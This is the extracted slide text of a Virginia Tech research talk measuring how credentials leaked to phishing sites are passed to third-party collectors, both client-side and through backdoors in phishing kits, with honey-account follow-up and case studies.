Understanding Credential Sharing on Phishing Sites Peng Peng Chao Xu Luke Quinn Hang Hu Bimal Viswanath Gang Wang Department of Computer Science Virginia Tech pengp17vtedu 2 Growing Prevalence of Phishing ID: 776159
Download Presentation The PPT/PDF document " What Happens After You Leak Your Passwo..." is the property of its rightful owner. Permission is granted to download and print the materials on this web site for personal, non-commercial use only, and to display it on your personal computer provided you do not modify the materials and that you retain all copyright notices contained in the materials. By downloading content from our website, you accept the terms of this agreement.
Slide1
What Happens After You Leak Your Password: Understanding Credential Sharing on Phishing Sites
Peng Peng, Chao Xu, Luke Quinn, Hang Hu, Bimal Viswanath, Gang WangDepartment of Computer Science, Virginia Techpengp17@vt.edu
Slide22
Growing Prevalence of Phishing
Slide3Growing Prevalence of Spear Phishing
3
Slide4Phishing Workflow
Standard phishing processLure users to visit phishing websites, leak sensitive info (e.g., password)Send sensitive info to the attacker
4
Victim
Phishing Page
Phishing Server
Attacker
Most existing works focuses on
front-end
Phishing web page (text, JavaScript, images)
Phishing URLs
Security indicators
Recent studies start to look at
back-end
Phishing kits analysis
Compromise servers for phishing
A lack of empirical understanding of the end-to-end information flow
Slide5This Study: End-to-End Analysis of Credential Sharing
Empirically understanding the end-to-end credential collection processCharacterizing 3rd-party sharing of collected credentials
5
Victim
Phishing Page
Phishing Server
1
st
-party Collector
Post-phishing exploitation
…
3
st
-party Collector
Client-side sharing
Server-side sharing
Slide6Outline
BackgroundClient-side sharingAuto login tool to feed passwordNetwork traffic analysisServer-side analysisPost-phishing exploitation
6
Victim
Phish Page
Server
1
st
-party
3
st
-party
Slide74 Phishing Blacklists
Data Collection
Developed a
browser-based
measurement tool using
SeleniumGiven a phishing page, submit fake passwordDetect traffic follow that send fake password to remote hosts
7
Auto fill in fake uname and passwd
Detect login form
- OCR + HTML + JS analysis
Activate login
- handle 2-step login
Auto “Log-in” + traffic Recording
Identify live pages
Aug.18 – Jan.19
179,000
+ Phish URLs
Final Dataset
41,986
Phishing sites over 5 months
Slide8Basic Observations
8
HTTPS or HTTP?
16,000+ (33%) phishing sites are hosted under HTTPS Deceive the users with the green padlock
Target Brands
Most sites are targeting financial or IT companies
Slide9Compromised Domains Hosting Phishing Pages
iccps.acm.org/admin/***Fake FedEx page under ICCPS conference site
conferences.sigcomm.org/css/***Fake French tax agency webpage under SIGCOMM conference site
councillorportal.ashfield.nsw.gov.au/Service/***Fake PayPal webpage under Australia government website
9
Slide10Client Side Third-party Credential Collectors
10
Web page from:
phishing.com
phishing.com
others.com
1st-party
3rd-party
Auto-login with an uniquely random password
Network flows that contain the plaintext/hashed password (31 hash/encode functions considered)
Slide11Findings on Third-Party Credential Sharing
About 5% (2,019) phishing URLs in our dataset have third-party collectors
11
Prevalence
Are they flagged?
30% collector domains have a “poor” reputation according to Talos IP, Cisco Domain Reputation 80% collector URLs are labeled as “Phishing” by VirusTotal But most of them are still alive
The majority of collectors (56%) are hosted in a different country from the phishing domain
Where are they?
Slide12Examples: Client Side 3rd-party Collectors
12
Case StudyDomain# Phish URLsDescriptionw32.info731Once hosted many phishing kits for downloadingip-api.org89Might be compromisedserveirc.com57Dynamic DNS service
Slide13Outline
BackgroundClient-side sharingServer-side analysisPhishing kits collectionSandbox analysisPost-phishing exploitation
13
Victim
Phish Page
Server
1
st
-party
3
st
-party
Slide14Data Collection on Phishing Kits
Phishing kits: software kits used to deploy and operate phishing sitesGreedy method to collect phishing kits from phishing servers/URLsSearch for “open” directories (directory listing enabled)Check every path segment in the phishing URLsDownload compressed files (e.g., .zip)Try known phishing kits names against all phishing URLs2,064 phishing kits downloaded
14
Slide15Server Side 3rd-party Collectors
15
Phishing Kitscredentials sent to various email addresses
First-party@gmail.com
Phisher who deployed the phishing websites
Third-party@gmail.com
Backdoor hidden in the phishing kits
Static analysis:
1st-party
Dynamic analysis [1]3rd-party
Plaintext Searching
Running in a sandbox
[1] Marco et al. WOOT’08
Slide16Prevalence of Third-Party Collectors
16
Number of Collectors per Phishing Kit
CDF (%)
4.6% kits have third-party collectors
Most kits have a first-party collector
One kit has 20 third-party collectors
Server-side third-party sharing exists but is not very prevalent
Slide17Outline
BackgroundClient-side sharingServer-side analysisPost-phishing exploitationCreate honey-account, leak them to attackersWait attackers to exploit the email account
17
Victim
Phish Page
Server
1
st
-party
3
st
-party
Slide18Honey Email Accounts
100 Gmail and 50 ProtonMail accountsPopulated them with emails from the public Enron email dataset
18
Setup Honey Accounts
Account Leakage
Leaked the email address and password to different phishing sites (one per site)
Account Activity Monitoring
Gmail: “Last account activity” pageProtonMail: login logs
7 accounts (out of 150) received logins within 50 days of leakage
Slide19Case Study 1
19
Phishing site target: PayPalAccount type: GmailFirst Login: 30 mins# login attempts: 9# login IPs: 1Register AWS services and try to pay bills
Slide20Case Study 2
20
Target brand: LinkedInAccount type: ProtonMailFirst Login: 5 hours# login attempts: 6# login IPs: 4# Emails read: 2Credentials are widely shared in near real-time
Phishing site hosted in the US
5 hours: Attacker 1 logged in from Nigeria
3 days: Attacker 2 in logged in from China
15 days: Attacker 1 checked in again
Slide21Conclusion
Empirical measurement on credential sharing during phishing attacksAnalysis on 179,000 phishing URLs (47,000 live phishing sites)Credentials sharing happens at both client and server sides, exposing the credentials to more attackers, but the good news is it is not yet very prevalentThird-party collectors are often flagged by blacklists, but they are rarely taken downThoughts: leveraging third-party collectors for defense Defenders (service providers) take over the detected 3rd party collector emails/domainsKeep them alive, use them as vantage point to monitor the phishing activitiesPinpoint future attacks and alert victims
21
Slide22Thank You
22
pengp17@vt.edu
Please kindly forward your questions to the author